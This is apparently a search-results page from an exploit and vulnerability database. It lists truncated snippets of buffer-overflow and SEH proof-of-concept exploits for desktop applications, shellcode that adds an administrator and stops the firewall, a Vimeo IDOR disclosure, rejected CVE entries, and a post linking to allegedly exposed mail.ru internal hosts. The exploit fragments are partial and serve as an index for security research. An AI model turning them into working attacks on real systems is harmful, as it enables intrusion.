11967 matches found
ManageEngine Password Manager Pro Default Credentials
The remote ManageEngine Password Manager Pro web administration interface uses a known set of default credentials. An attacker can use these to gain access to the remote host. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. include'deprecatednasllevel.inc'; include'compat.inc'; if descriptio...
MyBB < 1.6.13 Multiple Vulnerabilities
Binary data 8629.prm...
Mail.ru: http://217.69.136.200/?p=2&c=Fetcher%20cluster&h=fetcher1.mail.ru
Тут опять вкусное наружу: http://217.69.136.200/?p=2&c=Fetcher%20cluster&h=fetcher1.mail.ru http://217.69.136.200/lib/ это если что: el7-fetcher1.g.smailru.net...
Design/Logic Flaw
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: None. Reason: This ID is frequently used as an example of the 2014 CVE-ID syntax change, which allows more than 4 digits in the sequence number. Notes: See references...
CVE-2014-100000
CVE-2014-100000 is rejected/not used per the Initial Description.
Obfuscated Shellcode Windows x64 - 1218 Bytes Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service
Obfuscated Shellcode Windows x64 - 1218 Bytes Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Fire... Author: Ali Razmjoo Title: Obfuscated Shellcode Windows x64 1218 Bytes Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP Fro...
Kenward-Zipper-1.4
Exploit Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit Date : 23/3/2010 Bug found by : corelanc0d3r http://www.corelan.be:8800/ Author : mrme http://net-ninja.net/ Software Link : http://www.trans4mind.com/personaldevelopment/zipper/ Version : 1.4 ldfheader =...
GSM-SIM-Utility-5.15
Exploit Title : GSM SIM Utility sms file Local SEH BoF Date : June 28, 2010 Author : chap0 www.seek-truth.net Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-185084-10396246.html?tag=mncol Version : 5.15 import time sc ="d9eb9bd97424f431d2b27a31c964" "8b71308b760c8b761c8b46088b7e"...
Winamp-5.572---Local-BoF
Exploit Title: Winamp v5.572 Local BoF Exploit Win7 ASLR and DEP Bypass Date: June 26, 2010 Author: Node Software Link: http://download.nullsoft.com/winamp/client/winamp5572fullemusic-7plusen-us.exe Badchars: \x00\xff\x5c\x2f\x0a\x0d\x20 version = "Winamp 5.572" rop = "A" 540 Offset rop +=...
FieldNotes-32-5.0
Title: FieldNotes 32 v5.0 SEH 0day Date: 25/06/2010 Author: TecR0c - http://tecninja.net/blog aka Rocco Calvi Found by: TecR0c - http://twitter.com/TecR0c Advisory: http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053 msg = TITLE=Corelan TEXT="TecR0c pwned you"...
WM-Downloader-3.1.2.2-2010.04.15
Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow SEH Date: 2010-07-28 Author: fdisk @fdiskyou e-mail: fdiskyou at deniable.org payload = "\x41" 43485 payload += "\xeb\x16\x90\x90" jump payload += "\xb4\x15\xbb\x01" ppr - WDCodec00.dll payload += "\x90" 16 windows/exec - 227 bytes...
QQPlayer-2.3.696.400p1-smi
A different SEH addr might be necessary for XP SP3 ENG. Make sure EAX aligns to the shellcode before decoding. head =''' ''' payload=head+junk+nseh+seh+adjust+shellcode+junk+foot fobj = open"poc.smi","w" fobj.writepayload fobj.close...
MUSE-4.9.0.006-(.pls)
Exploit Title: MUSE v4.9.0.006 .pls Local Universal Buffer Overflow SEH Date: August 17, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom payload = "\x41" 1376 payload += "\xeb\x06\x90\x90" payload += "\xAA\x0c\x02\x10" 10020CAA sdll.dll universal payload += "\x90" 16 win32exec -...
Xion-Player-1.0.125
Script provided as is without any warranty. Use for educational purposes only. Do not use this code to do anything illegal ! Corelan does not want anyone to use this script outputfile="corelanc0d3r.m3u" offsettonseh=250 affected by the m3u path length ! junk = "A" offsettonseh nseh="\x41\x45"...
A-PDF-All-to-MP3-Converter-1.1.0
Exploit Title: A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit Date: September 18, 2010 Author: modpr0be import struct junk1 = 'A' 4132 nseh = "\xeb\x06\x90\x90" seh = struct.pack'L', 0x00408B44 ppr nops2 = "\x90" 12 metasploit payload windows/exec cmd=calc | msfencode -e...
DJ-Studio-Pro-8.1.3.2.1
DJ Studio Pro Version 8.1.3.2.1 SEH 0 day Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ filename = "ASL.pls" windows/exec - CMD=calc.exe shellcode = "\x41\x42\x48\x49\x41\x42\x48\x49" Egg Hunted...
Excel-RTD-Memory-Corruption
Analysis: http://www.abysssec.com Vendor: http://www.microsoft.com Impact: Critical import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:4509 str2 = strTotal5013:15000 str3 = strTotal15800: eip = "\xAd\x57\x00\x30" pop pop ret jmp = "\xF7\xC2\x03\x30" call esp...
Foxit-Reader-4.1.1-EggHunter
Date: 15 Nov 10 Author: dookie at offsec.com App: Foxit Reader 4.1.1 preamble =...
Vimeo: Vimeo.com Insecure Direct Object References Reset Password
Hello, my name is Toufik Airane. This is Responsible Disclosure and Silent Disclosure. Thanks you to opened bug bounty program! Please find a proof of concept for IDOR attack on famous vimeo.com. With this IDOR, attacker can reset any password, of any account and take controle of it. Please, find...
Design/Logic Flaw
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2014-9323. Reason: This candidate is a reservation duplicate of CVE-2014-9323. Notes: All CVE users should reference CVE-2014-9323 instead of this candidate. All references and descriptions in this candidate have been removed to...